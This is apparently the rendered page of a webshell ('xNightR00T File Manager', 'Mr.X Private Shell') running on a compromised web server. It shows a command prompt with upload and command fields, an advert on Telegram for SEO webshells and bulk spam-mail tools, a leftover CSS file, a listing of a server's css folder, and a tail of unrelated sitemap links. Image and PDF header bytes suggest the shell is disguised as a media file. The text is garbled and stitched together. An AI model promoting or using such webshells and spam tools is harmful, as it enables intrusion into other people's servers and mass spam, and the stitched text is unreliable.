xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
/* UI GRID CSS */
.expand-div {
    -webkit-transition: 0.3s linear all;
    -moz-transition: 0.3s linear all;
    -o-transition: 0.3s linear all;
    transition: 0.3s linear all;
    opacity: 0;
}

.new-expand-div {
    opacity: 1;
}

.expand-div.ng-leave-active {
    opacity: 0;
}

@-moz-document url-prefix() {
    .ui-grid-row {
        width: 101%;
    }
}
.sub-title-design{
    font-size: 18px;
    color: #2774A0;
    font-weight: normal;
    margin-bottom: 18px;
}
.sub-title-design-bread{
    
}
.sub-title-design-bread h2{
    font-size: 18px;
    color: #2774A0;
    font-weight: normal;
    margin-bottom: 18px;
}

.sub-title-design-bread-blue {
    height: 41px;
    width: 100%;
    background: #2774A0;
    color: #7d8f97;
    font-size: 14px;
    z-index: 100;
}

.sub-title-design-bread-blue h2 {
    float: left;
    margin: 10px 8px 10px 13px;
    font-size: 20px;
    font-weight: normal;
    color: #fff;
}

.ui-grid-table{
   border : 1px #d4d4d4 solid;
   border-top: 2px solid #0171A1;
   background: #fff;
   font-weight: normal; 
}
.ui-grid-table td{
    padding: 4px;
    overflow: hidden;
    background-color: inherit;
    border-right: 1px solid;
    border-color: #d4d4d4;
    box-sizing: border-box;
}

.ui-grid-table .center{
    text-align: center;
    padding-top: 11px;
}
a.link-design-1{
 color: #000000;
}
.ui-grid-table th{
    padding: 10px;
    overflow: hidden;
    background-color: inherit;
    border-right: 1px solid;
    border-color: #d4d4d4;
    box-sizing: border-box;
    font-weight: normal;
}
.ui-grid-table tr{
    border-bottom: 1px solid;
    border-color: #d4d4d4;
    
}
.ui-grid-table tr:nth-child(even), .ui-grid-table tr:nth-child(even) {
    background: #EEE;
}

.ui-grid-cell-contents-center {
    text-align: center;
}

.ui-grid-cell-contents-icons img, .ui-grid-cell-contents-icons i {
	vertical-align: middle;
}

.ui-grid-cell-contents-left {
    text-align: left;
	padding-left: 15px;
}

.ui-grid-cell-contents-right {
    text-align: right;
}

.ui-grid-cell-contents .btn {
    display: inline-block;
    vertical-align: top;
    border: 1px solid #999999;
    color: #44afe5;
    text-align: center;
    padding: 0px 8px;
    border-radius: 1px;
    background: #fff;
    transition: 0.2s all;
    opacity: 0.8;
}

.ui-grid-cell-contents .btn .glyphicons:before {
    padding: 4px 0;
}

.ui-grid-cell-contents .btn:hover:not([disabled]) {
    background: #E4E4E4;
    opacity: 1;
}

.ui-grid-cell-contents .btn[disabled] {
    pointer-events: none;
    opacity: 0.5;
    border-color: gray;
    color: gray;
}
.ui-grid-cell-contents.ui-grid-cell-actions {
    padding:3px;
}
/*.ui-grid-canvas {
    border: 1px solid #dddddd;
}
.ui-grid {
    border:0;
}*/
.ui-grid-top-panel {
    border-top: 2px solid #0171A1;
    background: #fff;
    font-weight: normal;
}

.ui-grid-row:hover>[ui-grid-row]>.ui-grid-cell,
.ui-grid-row .ui-grid-cell.expanded,
.ui-grid-row .ui-grid-sub-section-row .ui-grid-sub-row .ui-grid-cell.expanded {
    background: #e2e2e2;
}

.ui-grid-header-cell {
    padding: 4px;
}

.ui-grid-cell,
[ui-grid-expandable-row] {
    border-bottom: 1px solid #dddddd;
}

.ui-grid-pager-panel {
    background: #efefef;
    border-top: 1px solid #E6E6E6;
}

.ui-grid[ui-grid-pagination] {
    padding-bottom: 33px;
}

.ui-grid.auto-height, .ui-grid.auto-height .ui-grid-viewport {
    height: auto !important;
}

[ui-grid-expandable-row] {
    background: #fff;
    height: auto !important;
}

.loading-expanded {
    text-align: center;
    font-size: 28px;
}

.loading-expanded span {
    padding-top: 50px;
    display: block;
}

.ui-grid-empty {
    padding: 8px;
    margin-top: -20px;
}

.ui-grid-cell-indent {
    margin-left: 43px;
}

.ui-grid-sub-section-row:nth-child(odd) .ui-grid-sub-row .ui-grid-cell {
    background-color: #fdfdfd;
}

.ui-grid-sub-section-row:nth-child(even) .ui-grid-sub-row .ui-grid-cell {
    background-color: #f3f3f3;
}

.ui-grid-sub-row {
    height: 30px;
}

.ui-grid-header-cell input[type="checkbox"],
.ui-grid .ui-grid-cell input[type="checkbox"] {
    margin: 0px auto;
}

.ui-grid-cell-checkbox {
    padding: 0;
    margin-top: 6px;
}
/* WHEN WE HAVE TREE + EXPAND ROW, SEE LABRARIES PAGE */
#libraries-ui-grid .expandableRow {
    margin: 0 !important;
}

#libraries-ui-grid .ui-grid-tree-header-row {
  /* for some reason ui-grid has important tag in css, we must important also to override it */
    font-weight: normal !important;
}

.ui-grid .ui-grid-hover-background:hover {
    background: #f7f7f7;
}


.ui-grid.sub-ui-grid .ui-grid-top-panel {
    display:none;
}
.ui-grid.sub-ui-grid {
    border-left: 0;
    border-right: 0;
    border-bottom: 0;
}
.ui-grid[ui-grid-resize-zs] .ui-grid-viewport {
    padding-left: 1px;
}
.ui-grid[ui-grid-resize-zs] .ui-grid-cell:last-child {
    padding-right:20px;
}
.ui-grid[ui-grid-resize-zs] .ui-grid-row:last-child {
    border-bottom: 1px solid #dddddd;
}

.ui-grid-cell-contents-36 {
	line-height: 22px;
}
.ui-grid-header-cell .sortable[aria-sort="descending"],
.ui-grid-header-cell .sortable[aria-sort="ascending"] {
    font-weight: bold;
}
.myclass {
	color: red;
}

.serverStatusSpin {
    margin-left: 11px;
}

Filemanager

Name Type Size Permission Actions
devbar Folder 0755
admin.css File 10.21 KB 0644
appList.css File 3.72 KB 0644
azure.css File 89 B 0644
bootstrap.css File 3.09 KB 0644
charts.css File 267 B 0644
codetracing.css File 11.04 KB 0644
configImport.css File 277 B 0644
configuration.css File 4.1 KB 0644
dashboard.css File 19 B 0644
datepicker_dashboard.css File 5.42 KB 0644
dcpulse.css File 7.75 KB 0644
devbar-azure.css File 3.04 KB 0644
devbar-embedded.css File 28.83 KB 0644
devbar-iframe.css File 4.09 KB 0644
devbar-zray-standalone.css File 1.56 KB 0644
devbar.css File 150.63 KB 0644
error.css File 936 B 0644
events.css File 244 B 0644
expired.css File 6.84 KB 0644
filter.css File 7.95 KB 0644
glyphicons.css File 45.76 KB 0644
guidePageZrayStandalone.css File 1.26 KB 0644
guidepage.css File 16.6 KB 0644
history.css File 6.39 KB 0644
icons.css File 1.12 KB 0644
ipwidget.css File 98 B 0644
issueDetails.css File 3.65 KB 0644
jobqueue_settings.css File 448 B 0644
jobs.css File 1.53 KB 0644
jqpulse.css File 13.77 KB 0644
layout.css File 12.83 KB 0644
libsList.css File 508 B 0644
license.css File 2.48 KB 0644
login.css File 5.09 KB 0644
logs.css File 6.97 KB 0644
monitor-rules.css File 1.37 KB 0644
monitor-settings.css File 1013 B 0644
monitorRule.css File 6.43 KB 0644
pageCache.css File 4.47 KB 0644
plugins.css File 13.78 KB 0644
prereq.css File 519 B 0644
recurringJob.css File 2.43 KB 0644
rulesList.css File 1.14 KB 0644
serverInfo.css File 1.49 KB 0644
servers.css File 607 B 0644
sessionClustering.css File 704 B 0644
simplemodal.css File 975 B 0644
spinner-input.css File 765 B 0644
spinner.css File 1.3 KB 0644
studio.css File 17.42 KB 0644
style.css File 82.54 KB 0644
tags.css File 477 B 0644
toast.css File 1.84 KB 0644
ui-grid-zs.css File 5.07 KB 0644
uploader.css File 1.78 KB 0644
urlinsight.css File 16.69 KB 0644
urlinsightRules.css File 357 B 0644
vhosts.css File 7.26 KB 0644
webApi.css File 251 B 0644
wizard.css File 15.21 KB 0644
z-ray-libs.css File 210.67 KB 0644
z-ray-libs.min.css File 187.41 KB 0644
zgrid.css File 13.86 KB 0644
zmenu.css File 763 B 0644
zray-standalone.css File 810 B 0644
zs-reset.css File 5.56 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml